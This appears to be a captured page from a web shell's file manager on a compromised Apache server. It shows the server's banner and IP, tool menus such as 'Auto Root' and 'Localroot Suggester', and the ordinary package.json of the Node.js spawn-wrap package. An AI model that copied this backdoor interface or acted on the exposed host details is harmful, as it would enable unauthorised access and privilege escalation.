Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
spawn-wrap /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2024-07-09 21:58
index.js
4.27
KB
-rw-r--r--
2023-08-21 05:40
package.json
1.06
KB
-rw-r--r--
2023-08-21 05:40
pkgjs-lock.json
1.03
KB
-rw-r--r--
2023-08-21 05:40
shim.js
4.78
KB
-rw-r--r--
2023-08-21 05:40
Save
Rename
{ "name": "spawn-wrap", "version": "2.0.0", "description": "Wrap all spawned Node.js child processes by adding environs and arguments ahead of the main JavaScript file argument.", "main": "index.js", "engines": { "node": ">=8" }, "dependencies": { "foreground-child": "^2.0.0", "is-windows": "^1.0.2", "make-dir": "^3.0.0", "rimraf": "^3.0.0", "signal-exit": "^3.0.2", "which": "^2.0.1" }, "scripts": { "test": "tap", "release": "standard-version", "clean": "rm -rf ~/.node-spawn-wrap-*" }, "repository": { "type": "git", "url": "git+https://github.com/istanbuljs/spawn-wrap.git" }, "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)", "license": "ISC", "bugs": { "url": "https://github.com/istanbuljs/spawn-wrap/issues" }, "homepage": "https://github.com/istanbuljs/spawn-wrap#readme", "devDependencies": { "standard-version": "^7.1.0", "tap": "^14.10.5" }, "files": [ "lib/", "index.js", "shim.js" ], "tap": { "coverage": false, "timeout": 240 } }